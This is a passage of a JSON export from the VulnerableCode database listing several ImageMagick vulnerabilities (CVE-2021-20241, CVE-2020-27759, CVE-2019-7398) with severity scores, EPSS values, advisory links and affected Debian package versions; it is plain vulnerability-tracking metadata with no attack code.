"VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13454" ], "risk_score": 1.6, "exploitability": "0.5", "weighted_severity": "3.1", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tc3z-912z-afc8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80620?format=api", "vulnerability_id": "VCID-tm56-q7ka-ukft", "summary": "ImageMagick: Division by zero in WriteJP2Image() in coders/jp2.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20241.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20241.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20241", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43385", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43365", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43499", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43434", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43446", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43474", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43412", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43463", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43478", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43496", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43465", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.4345", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.4351", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20241" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20241", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20241" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282", "reference_id": "1013282", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928952", "reference_id": "1928952", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928952" }, { "reference_url": "https://security.archlinux.org/AVG-1579", "reference_id": "AVG-1579", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1579" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/7164-1/", "reference_id": "USN-7164-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7164-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-20241" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tm56-q7ka-ukft" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82009?format=api", "vulnerability_id": "VCID-tn11-bwg6-m3e3", "summary": "ImageMagick: outside the range of representable values of type 'int' at MagickCore/quantize.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27759.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27759.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27759", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24834", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24914", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24954", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24729", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24796", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24841", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24855", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24816", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24759", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.2477", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24762", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24739", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24678", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27759" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27759", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27759" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894238", "reference_id": "1894238", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894238" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27759" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tn11-bwg6-m3e3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82835?format=api", "vulnerability_id": "VCID-twq8-ntkg-zbfk", "summary": "ImageMagick: Memory leak in the WriteDIBImage function in coders/dib.c", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-7398.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-7398.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00239", "scoring_system": "epss", "scoring_elements": "0.46977", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00239", "scoring_system": "epss", "scoring_elements": "0.47023", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00239", "scoring_system": "epss", "scoring_elements": "0.47035", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00239", "scoring_system": "epss", "scoring_elements": "0.47091", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00239", "scoring_system": "epss", "scoring_elements": "0.47087", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00239", "scoring_system": "epss", "scoring_elements": "0.47013", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00239", "scoring_system": "epss", "scoring_elements": "0.47032", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00239", "scoring_system": "epss", "scoring_elements": "0.46979", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00239", "scoring_system": "epss", "scoring_elements": "0.47034", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00239", "scoring_system": "epss", "scoring_elements": "0.4703", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00239", "scoring_system": "epss", "scoring_elements": "0.47054", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00239", "scoring_system": "epss", "scoring_elements": "0.47028", "published_at": "2026-04-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-7398" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": 